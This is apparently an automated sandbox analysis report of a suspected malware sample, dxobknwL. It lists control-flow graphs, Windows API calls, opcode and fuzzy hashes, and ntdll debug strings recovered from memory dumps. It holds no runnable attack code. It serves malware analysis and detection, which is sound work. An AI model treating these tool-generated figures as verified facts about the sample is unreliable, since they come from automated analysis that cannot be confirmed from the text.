                                                                                          control_flow_graph 28 401af2-401b18 29 401b20-401b33 28->29 29->29 30 401b35-401b51 call 4010e0 29->30 33 401b56-401b5c 30->33 33->33 34 401b5e-401b82 call 401d70 33->34 37 401b87-401b8d 34->37 37->37 38 401b8f-401b9e 37->38 39 401ba3-401ba4 38->39 39->39 40 401ba6-401bab 39->40 41 401bb0-401bc1 40->41 41->41 42 401bc3-401bd8 41->42 42->42 43 401bda-401bdf 42->43 44 401be0-401bf1 43->44 44->44 45 401bf3-401c19 EntryPoint 44->45 46 401c20-401c26 45->46 46->46 47 401c28 call 430153 46->47 48 401c2a-401c2d 47->48 49 401c32-401c45 48->49 49->49 50 401c47-401c4c 49->50 51 401c50-401c61 50->51 51->51 52 401c63-401c78 51->52
                                                                                          APIs
                                                                                          • EntryPoint.DXOBKNWL(?,0000032C,?), ref: 00401BFF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EntryPoint
                                                                                          • String ID: a```
                                                                                          • API String ID: 3225343992-3259403941
                                                                                          • Opcode ID: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                          • Instruction ID: 9cd544999dd2b03daafdb1c4164150612a4eeb260070e7f16c4efc787f4e75c6
                                                                                          • Opcode Fuzzy Hash: 37e4198fb5929ccfe9e0cdf19a80b84de2d2ff779a2e1572c8cfdac560582edc
                                                                                          • Instruction Fuzzy Hash: ED31F771F042194BDF1C86288C507AEB666DB94344F4881BBE909AF7E1E6786E448B84
                                                                                          Function 0042CE73 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 54 42ce73-42ceb7 call 404973 call 42dd63 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CEB2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID: whA
                                                                                          • API String ID: 3298025750-33568622
                                                                                          • Opcode ID: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                                          • Instruction ID: df9e10e1718a61ed7688cb98799c3328294b3d2316893391272a51bf3c6f2a62
                                                                                          • Opcode Fuzzy Hash: f7f17f16f19a4c2e0ff3f1a24c14e8ee95f433df49a0a93ff094377edf1ac6b4
                                                                                          • Instruction Fuzzy Hash: 5EE06DB26002047BD610EF59EC81EAB33ACEFC5710F40401AFA08A7241C671B910CBF9
                                                                                          Function 00417BB3 Relevance: 1.6, APIs: 1, Instructions: 105libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 98 417bb3-417bc4 99 417b81-417b83 98->99 100 417bc6-417bd3 98->100 103 417b89-417b91 99->103 104 417b84 call 42e263 99->104 101 417bd5-417bd6 100->101 102 417bd7-417bde 100->102 101->102 107 417be1-417be7 102->107 105 417b93-417ba7 LdrLoadDll 103->105 106 417baa-417bad 103->106 104->103 105->106 108 417be9 107->108 109 417bed-417bf5 107->109 110 417bea 108->110 111 417c5f-417c64 108->111 112 417bfa-417c03 109->112 110->112 115 417beb-417bec 110->115 113 417c41-417c55 111->113 114 417c66-417c6f 111->114 112->113 113->107 118 417c57-417c58 113->118 117 417c71-417c91 114->117 115->109 118->117 119 417c5a-417c5e 118->119 119->111
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                                          • Instruction ID: 93b2374f167c02f6a28249779b1fd5adc8fce152e1fc3efdeaf84b546dfcf957
                                                                                          • Opcode Fuzzy Hash: 9c1eec5154773877787138fe86bce77930200dc82f902c6671fe6d8f6ed452b9
                                                                                          • Instruction Fuzzy Hash: 4421C07294C206ABDB00E9749846ACB7774FB45318F04455AD80C9B702E739B6968BD5
                                                                                          Function 00417B27 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 135 417b27-417b30 136 417b90-417ba7 LdrLoadDll 135->136 137 417b32-417b5c call 42f7c3 135->137 138 417baa-417bad 136->138 142 417b62-417b70 call 42fdc3 137->142 143 417b5e-417b61 137->143 146 417b80-417b91 call 42e263 142->146 147 417b72-417b7d call 430063 142->147 146->138 152 417b93-417ba7 LdrLoadDll 146->152 147->146 152->138
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                                          • Instruction ID: 520125f5abcca6f32ee259adfec299557dcb37a3b4497778880cbe12b8f3150b
                                                                                          • Opcode Fuzzy Hash: a6e2919529e9c876640029debfc0c632573f28569a56996c2d7557fe68807e94
                                                                                          • Instruction Fuzzy Hash: A4F02BB190C24DABCB20CE64DC409DDBB74AF55234F0487EED998671C2E2305649C756
                                                                                          Function 0042CE23 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 153 42ce23-42ce67 call 404973 call 42dd63 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041E934,?,?,00000000,?,0041E934,?,?,?), ref: 0042CE62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                                          • Instruction ID: 54a44c9eb01fc689f5ac2f601c65d0757ab140ae4e4e75f286cde17a1d142988
                                                                                          • Opcode Fuzzy Hash: 95b7bf504a5d7150f79f6da0c0947be83d3fb5d3e638616617d95ae11c794cbc
                                                                                          • Instruction Fuzzy Hash: 86E06DB52042047BD620EE59EC45EEB37ADEFC5710F40441AFA48A7241CA70B9108BB9
                                                                                          Function 0042CEC3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 163 42cec3-42ceff call 404973 call 42dd63 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,43F334D9,?,?,43F334D9), ref: 0042CEFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2176402254.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_dxobknwL.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0
                                                                                          • Opcode ID: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                                          • Instruction ID: 54eb179f5a4ec7a69d43dd70d9c2d94cb10809d16adc756a8638f1923563bae3
                                                                                          • Opcode Fuzzy Hash: 48a4ca06673889c6306624666cc140c898ea0e1073073a3aa0900f5f06714748
                                                                                          • Instruction Fuzzy Hash: 64E04F712102147BD120EA6ADC41F9BB76CDBC5714F40802AFA08A7281C670B90187F4
                                                                                          Function 2A082C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 168 2a082c0a-2a082c0f 169 2a082c1f-2a082c26 LdrInitializeThunk 168->169 170 2a082c11-2a082c18 168->170
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 7f1e834884e820e5bf0b24643fcbf7b7114464f6e6eaebce0dd1c4f614195ce2
                                                                                          • Instruction ID: 0a97edc640bcadd4161d1c8da0306c766e151706507d9e1903e2f82d5fd7e0de
                                                                                          • Opcode Fuzzy Hash: 7f1e834884e820e5bf0b24643fcbf7b7114464f6e6eaebce0dd1c4f614195ce2
                                                                                          • Instruction Fuzzy Hash: 22B09B719015C5C9E641F76056087177D4067D4701F15C071D2534655F473CC5D5F17D

                                                                                          Non-executed Functions

                                                                                          Function 2A0F8D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 2A0F8DD3
                                                                                          • *** Inpage error in %ws:%s, xrefs: 2A0F8EC8
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 2A0F8DC4
                                                                                          • <unknown>, xrefs: 2A0F8D2E, 2A0F8D81, 2A0F8E00, 2A0F8E49, 2A0F8EC7, 2A0F8F3E
                                                                                          • *** then kb to get the faulting stack, xrefs: 2A0F8FCC
                                                                                          • an invalid address, %p, xrefs: 2A0F8F7F
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 2A0F8E4B
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 2A0F8F2D
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 2A0F8F3F
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 2A0F8DB5
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 2A0F8E75
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 2A0F8E24
                                                                                          • The resource is owned shared by %d threads, xrefs: 2A0F8E2E
                                                                                          • write to, xrefs: 2A0F8F56
                                                                                          • The instruction at %p tried to %s , xrefs: 2A0F8F66
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2A0F8E86
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 2A0F8F26
                                                                                          • This failed because of error %Ix., xrefs: 2A0F8EF6
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 2A0F8E02
                                                                                          • *** enter .exr %p for the exception record, xrefs: 2A0F8FA1
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 2A0F8E3F
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 2A0F8F34
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 2A0F8FEF
                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 2A0F8DA3
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 2A0F8EE2
                                                                                          • *** enter .cxr %p for the context, xrefs: 2A0F8FBD
                                                                                          • The critical section is owned by thread %p., xrefs: 2A0F8E69
                                                                                          • a NULL pointer, xrefs: 2A0F8F90
                                                                                          • read from, xrefs: 2A0F8F5D, 2A0F8F62
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 2A0F8D8C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                          • API String ID: 0-108210295
                                                                                          • Opcode ID: b4e2e0dd96162e4772d154a8b9aa575472b9296fa2c097a02fbce339c6124a06
                                                                                          • Instruction ID: 13b3b283d1480b2df1320c7bd9cbea77a97d3652dfa96f941edd712635f6e092
                                                                                          • Opcode Fuzzy Hash: b4e2e0dd96162e4772d154a8b9aa575472b9296fa2c097a02fbce339c6124a06
                                                                                          • Instruction Fuzzy Hash: B481F179940200BFCB11BB149CC4EAF7BB6EF96750F0104A5F208AF216F7768625DA67
                                                                                          Function 2A0C2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-2160512332
                                                                                          • Opcode ID: 7ba82a8ef93521b70f092577d6a4cd0d5999afa21b568c725a5d6bf5cf8d37c7
                                                                                          • Instruction ID: 54f209dac79c1fb825a1f884933259efbcd918092c7939d7c9bda8775039c5d8
                                                                                          • Opcode Fuzzy Hash: 7ba82a8ef93521b70f092577d6a4cd0d5999afa21b568c725a5d6bf5cf8d37c7
                                                                                          • Instruction Fuzzy Hash: F7926871648341AFE320EE24C880B5EF7EABB9CB50F01492DFA94D7651E770E944CB96
                                                                                          Function 2A0729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 2A0B2624
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2A0B25EB
                                                                                          • @, xrefs: 2A0B259B
                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 2A0B2409
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2A0B2506
                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 2A0B22E4
                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 2A0B2602
                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 2A0B2498
                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 2A0B24C0
                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 2A0B261F
                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 2A0B2412
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                          • API String ID: 0-4009184096
                                                                                          • Opcode ID: ab77d48ab78ad584d1fe44bafa9d9ef0c9d21b534af0817f87725e541ea062fa
                                                                                          • Instruction ID: 46965d56cbfc5032fe3f2b4151209aaace60788e6441a63a541f8872735f5324
                                                                                          • Opcode Fuzzy Hash: ab77d48ab78ad584d1fe44bafa9d9ef0c9d21b534af0817f87725e541ea062fa
                                                                                          • Instruction Fuzzy Hash: 2A023EB1D002289BDB61EB14CD80BDDF7B8AB5C304F4145EAE648A7242E771AF84CF59
                                                                                          Function 2A0E8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                          • API String ID: 0-2515994595
                                                                                          • Opcode ID: adea4eff02e829b82031793de780cc04d79d83de4956ce7b12b9364b1d69b919
                                                                                          • Instruction ID: 41e6f31cf6705bfac32424e3b3ec96177e070cf0d24996b7509808a3568a16dc
                                                                                          • Opcode Fuzzy Hash: adea4eff02e829b82031793de780cc04d79d83de4956ce7b12b9364b1d69b919
                                                                                          • Instruction Fuzzy Hash: DA51C2725093119FC325EF149A84BABB7ECFF95250F104A2DF958C3241E774E608DB96
                                                                                          Function 2A05AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-3197712848
                                                                                          • Opcode ID: 719d3e2b3524427d3e5e8e92e5baeb6ebc1b4704e0850a43e7208e2faab2d9f2
                                                                                          • Instruction ID: e9efa4d3caee46b255fa8a1c05e21085e7dedca0908c9f154b66482db6a2df78
                                                                                          • Opcode Fuzzy Hash: 719d3e2b3524427d3e5e8e92e5baeb6ebc1b4704e0850a43e7208e2faab2d9f2
                                                                                          • Instruction Fuzzy Hash: 85120571A093419FD320EF55C484BABB3E5FF85714F05492DFA859B282E734DA48CB92
                                                                                          Function 2A0F0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          • Opcode ID: 8ea039d24ee5d1b786254cba3f1c211fca6bd710ae4f44c887e17417b132706c
                                                                                          • Instruction ID: 5adcd9b6d275dbffbb8bc05fb5985dbd07e39a8c2857e948841c38550ad133e4
                                                                                          • Opcode Fuzzy Hash: 8ea039d24ee5d1b786254cba3f1c211fca6bd710ae4f44c887e17417b132706c
                                                                                          • Instruction Fuzzy Hash: 0CF12731940246EFCB25EF64D480FAAB7F5FF1A304F058869E681EB642DB74E949CB50
                                                                                          Function 2A0F0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                          • API String ID: 0-1700792311
                                                                                          • Opcode ID: f308f8d19bc903d5f23958527c96c07da820c981a4c76efb088445858b14bc1f
                                                                                          • Instruction ID: 6f47b6c1b939fcfed15594c4638ceaa6a98a57122b9fd7bd3667943e61446dfa
                                                                                          • Opcode Fuzzy Hash: f308f8d19bc903d5f23958527c96c07da820c981a4c76efb088445858b14bc1f
                                                                                          • Instruction Fuzzy Hash: B8D1F331A00685EFCB11EF64D481EADBBF1FF6A714F058869E545EB252EB38E940CB14
                                                                                          Function 2A072F98 Relevance: 9.1, Strings: 7, Instructions: 307COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 2A0B292E
                                                                                          • SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING., xrefs: 2A0B2856
                                                                                          • SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p, xrefs: 2A0B29B1
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 2A0B28B2
                                                                                          • RtlpProbeAssemblyStorageRootForAssembly, xrefs: 2A0B29AC
                                                                                          • SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed., xrefs: 2A0B2881
                                                                                          • @, xrefs: 2A073180
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$RtlpProbeAssemblyStorageRootForAssembly$SXS: %s() bad parametersSXS: Flags: 0x%lxSXS: Root: %pSXS: AssemblyDirectory: %pSXS: PreAllocatedString: %pSXS: DynamicString: %pSXS: StringUsed: %pSXS: OpenDirectoryHandle: %p$SXS: Assembly storage resolution failing probe because attempt to allocate %u bytes failed.$SXS: Assembly storage resolution failing probe because combined path length does not fit in an UNICODE_STRING.$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx
                                                                                          • API String ID: 0-541586583
                                                                                          • Opcode ID: 3ce2f56c3f5d29f019200d8a4a0da9a8ed1f4dd66dddf0175e99b8e6611ebbcc
                                                                                          • Instruction ID: c8358734cd0cd9f6718caeef58e08638116edba066093b8dfb07cb53d191613c
                                                                                          • Opcode Fuzzy Hash: 3ce2f56c3f5d29f019200d8a4a0da9a8ed1f4dd66dddf0175e99b8e6611ebbcc
                                                                                          • Instruction Fuzzy Hash: 22C1D171941228EFEB21AF55DC84BAAB3F4EF58710F0140E9E94CAB251E7709E81CF56
                                                                                          Function 2A0C89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • VerifierFlags, xrefs: 2A0C8C50
                                                                                          • HandleTraces, xrefs: 2A0C8C8F
                                                                                          • VerifierDlls, xrefs: 2A0C8CBD
                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 2A0C8A67
                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 2A0C8A3D
                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 2A0C8B8F
                                                                                          • VerifierDebug, xrefs: 2A0C8CA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2212688667.000000002A010000.00000040.00001000.00020000.00000000.sdmp, Offset: 2A010000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2a010000_dxobknwL.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                          • API String ID: 0-3223716464
                                                                                          • Opcode ID: b0f9211b90d0e4cf1d9da490e526fc602d098778c7162a4e8bcf98a77ffa77ed
                                                                                          • Instruction ID: 4eed329d26fe30e0c5a3a1c2d8069c666bb7a71f5be647c2679b665345558e36
                                                                                          • Opcode Fuzzy Hash: b0f9211b90d0e4cf1d9da490e526fc602d098778c7162a4e8bcf98a77ffa77ed
                                                                                          • Instruction Fuzzy Hash: 90912272A41711EFD311FF6898C0F5E77EAAB54B60F024468FA40AB252E7349D08CB9D
                                                                                          Function 2A0C4DD7 Relevance: 8.8, Strings: 7, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Execute '.cxr %p' to dump context, xrefs: 2A0C4EB1
